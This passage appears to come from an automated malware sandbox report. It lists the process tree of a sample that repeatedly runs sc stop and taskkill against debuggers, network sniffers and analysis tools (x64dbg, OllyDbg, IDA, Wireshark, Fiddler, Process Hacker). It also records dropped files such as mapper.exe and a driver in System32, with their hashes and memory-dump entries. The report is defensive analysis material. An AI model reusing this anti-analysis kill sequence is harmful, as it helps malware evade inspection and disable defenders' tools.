C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop KProcessHacker3 >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop KProcessHacker33⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop KProcessHacker2 >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop KProcessHacker23⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop KProcessHacker1 >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop KProcessHacker13⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop wireshark >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop wireshark3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HTTPDebuggerPro >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HTTPDebuggerPro3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq cheatengine*" /IM * /F /T3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq httpdebugger*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq processhacker*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq x64dbg*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq x32dbg*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq ollydbg*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq fiddler*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /FI "IMAGENAME eq die*" /IM * /F /T >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /FI "IMAGENAME eq die*" /IM * /F /T3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebugger.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebugger.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im FolderChangesView.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im FolderChangesView.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop HttpDebuggerSdk >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop HttpDebuggerSdk3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc stop npf >nul 2>&12⤵
-
C:\Windows\system32\sc.exesc stop npf3⤵
- Launches sc.exe
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerUI.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerUI.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im HTTPDebuggerSvc.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im HTTPDebuggerSvc.exe3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im Ida64.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im Ida64.exe3⤵
- Kills process with taskkill
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c taskkill /f /im OllyDbg.exe >nul 2>&12⤵
-
C:\Windows\system32\taskkill.exetaskkill /f /im OllyDbg.exe3⤵
- Kills process with taskkill
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5cd4f5fe0fc0ab6b6df866b9bfb9dd762
SHA1a6aaed363cd5a7b6910e9b3296c0093b0ac94759
SHA2563b803b53dbd3d592848fc66e5715f39f6bc02cbc95fb2452cd5822d98c6b8f81
SHA5127072630ec28cf6a8d5b072555234b5150c1e952138e5cdc29435a6242fda4b4217b81fb57acae927d2b908fa06f36414cb3fab35110d63107141263e3bba9676
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD51d40312629d09d2420e992fdb8a78c1c
SHA1903950d5ba9d64ec21c9f51264272ca8dfae9540
SHA2561e7c6aa575c3ec46cd1fdf6df51063113d277012ed28f5f6b37aea95cd3a64ac
SHA512a7073247ae95e451ed32ceeae91c6638192c15eaad718875c1272eff51c0564016d9f84690543f27df509a7d579de329d101fbf82fed7cbeb27af57393de24ac
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
48B
MD5376ae4a28616c97b2ac131144d6b136e
SHA127cc76bbe398fcb47b3ba9ef01b518afdbccd845
SHA256219c83594f3c31c56bf26a71be263176567672295efe48136b128b8718351941
SHA5122e987bdf890fec4bbb45e67f7b092c358ab9d9fd28472fa3dcd197254f563201fdf6ddf3075a1de8488b1d65719883fa30d9398c1f33bc5d270d332a094e94cd
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
144B
MD5da68e973ec877704b454ec08761eb5b1
SHA16517a49a29fba6830df1939104498445ff5595b3
SHA256d1d718090806774ef29302b13ba473a3dd60a1f2e86edf1e92b9944743400c02
SHA51204373748a25eef0feaba19940998f2d5351c35e2832c322598430c04da023b8edf4dc133bbaaa7dd46951cf791a3959caef45875d0ee52a13f04978e556927cf
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.icoFilesize
70KB
MD5e5e3377341056643b0494b6842c0b544
SHA1d53fd8e256ec9d5cef8ef5387872e544a2df9108
SHA256e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25
SHA51283f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnkFilesize
2KB
MD5399f52c2b3b984f27b6c66067ada7951
SHA159a972ad1d14b233f33441e825debba81ab11359
SHA2564b3ae1378d2a54491667925f0c8f197adfa1ea29a85d66fb4eb6961d958ec0cf
SHA512c8999ce315a94206c88bdbbb25bb3704f72f2870106ee223f21023c86602aafe053812a05f3090a7cfae21f5f0022c9a671a549c5694bba0e28811628fe9081d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
459B
MD54c71636df3378d902f54b0f18af4981f
SHA13cceca73199a5a5d0144a5eb9c8e592f57cb9f2c
SHA256002644ea7eab33173f9313663a2a39505e5332876df478a47b1c3a577b9509eb
SHA51223522e01afd053d6e4cbf7c4eb417d1f64868ab7f0326eeb448b0a3c761b0cd7b8b328217d837d74c98c10f79ebea1dfb82989b431758b18841a4ab6d6090792
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
4KB
MD51a675c63769ad19ffcc5bd4c51a22265
SHA17b900407dbaa0edcff57ad3f305c32d4bcb9fc8b
SHA25641e3d7491ee150d54c9144ffb7a5772d4c0869f6339f2a330b4383a52b99f117
SHA5126f8ed3afdfa031f54215b83642150862aaa26d181c9cf7ae7ae8ac28e38653736c0dcd199e10baa5da30f9de8e12b5e457bbef1589a49eaa29cf4542efc11f87
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD56e304515318665deb30abdc0204fb88f
SHA1e3ba06d571f7372b1168602be597ad150cb0145c
SHA256e9b126defc6d858f033bacf1432b8181f0331e3ff7e2750f1b89e12d363f0420
SHA512c5bf34b28552ca066aac1e2c18e92e299fd4c3f32c14df02998b6e56b29091144f9fa637466a104bd184125ee91f4167ea2414614e7495a7520d47a4fb28594d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure PreferencesFilesize
24KB
MD51463bf2a54e759c40d9ad64228bf7bec
SHA12286d0ac3cfa9f9ca6c0df60699af7c49008a41f
SHA2569b4fd2eea856352d8fff054b51ea5d6141a540ca253a2e4dc28839bc92cbf4df
SHA51233e0c223b45acac2622790dda4b59a98344a89094c41ffdb2531d7f1c0db86a0ea4f1885fea7c696816aa4ceab46de6837cc081cd8e63e3419d9fcb8c5a0eb66
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\CURRENTFilesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\MANIFEST-000001Filesize
41B
MD55af87dfd673ba2115e2fcf5cfdb727ab
SHA1d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\GrShaderCache\GPUCache\data_1Filesize
264KB
MD5f50f89a0a91564d0b8a211f8921aa7de
SHA1112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
9KB
MD5bbb7d6c30e786bdcb3c0d28cad0bfca5
SHA1d6c598571ba677c8e8e0fe4757d0072901f33a33
SHA256daf672e38addc2fb6b1f5242be4afa3c598031ed3f84d0d3d4803b7f03b6accb
SHA512ea211c738d01940e1b7318436bc72162cba4b9ac2782ffdda481d5c53dd7f3abcfa855e2b6019b867a74fd5fb1e964fc063b841c24947ea13d24320227316ec6
-
C:\Windows\System32\NeptnDriver.sysFilesize
9KB
MD5a1367ef701a8b404b03e7437fe67309c
SHA1e0134d68196f23ef0b48e088e556cf74bb06d173
SHA256e791c02a1c32806c00c17d76d16d89a06713b66beecf51d644f47d9391f959f1
SHA5126c3cfeb8949efe5a214b2ce1a910497c5189bab88cbdd3efb287e31f271782e13ca6c3c54342b809d28e99f898d60fc2b609e2fbb3a40a346b8f6f809082f90b
-
C:\Windows\System32\mapper.exeFilesize
163KB
MD50041a7d5d2f2f207579ebed379346d0c
SHA184d494a52ab9fdb21d0f0b380fe66e6d001b61c9
SHA256e3c8c1b1258f0f16f036d8ebbc24b85ba34238965304033b3d25f38295989f0a
SHA51212e59d35ef24fa1417d3ebc0ac3dc1173fd330f48b20c2640da32c621ad00e61ad97b733a4435c9de1cdaa1cefb3f564da19a9515ae2eab0c794dd3dd9f2aec8
-
C:\Windows\System32\mapper.exeFilesize
163KB
MD50041a7d5d2f2f207579ebed379346d0c
SHA184d494a52ab9fdb21d0f0b380fe66e6d001b61c9
SHA256e3c8c1b1258f0f16f036d8ebbc24b85ba34238965304033b3d25f38295989f0a
SHA51212e59d35ef24fa1417d3ebc0ac3dc1173fd330f48b20c2640da32c621ad00e61ad97b733a4435c9de1cdaa1cefb3f564da19a9515ae2eab0c794dd3dd9f2aec8
-
\??\pipe\LOCAL\crashpad_232_YXPANCKIBKDZMJCZMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
memory/2756-151-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-408-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-154-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-155-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-152-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-133-0x00007FF6EFCF0000-0x00007FF6F0609000-memory.dmpFilesize
9.1MB
-
memory/2756-150-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-148-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-149-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-147-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-146-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-145-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-143-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-142-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-141-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-140-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-270-0x00007FF6EFCF0000-0x00007FF6F0609000-memory.dmpFilesize
9.1MB
-
memory/2756-139-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-137-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-138-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-136-0x00007FF6EFCF0000-0x00007FF6F0609000-memory.dmpFilesize
9.1MB
-
memory/2756-135-0x00007FF6EFCF0000-0x00007FF6F0609000-memory.dmpFilesize
9.1MB
-
memory/2756-134-0x00007FF6EFCF0000-0x00007FF6F0609000-memory.dmpFilesize
9.1MB
-
memory/2756-404-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-405-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-406-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-407-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-153-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-409-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-411-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-410-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-412-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-413-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-415-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-416-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-417-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-418-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-414-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-419-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-420-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-421-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-422-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-424-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-425-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-426-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-427-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-423-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-428-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-429-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-430-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-431-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-432-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB
-
memory/2756-433-0x000002042FE80000-0x000002042FE81000-memory.dmpFilesize
4KB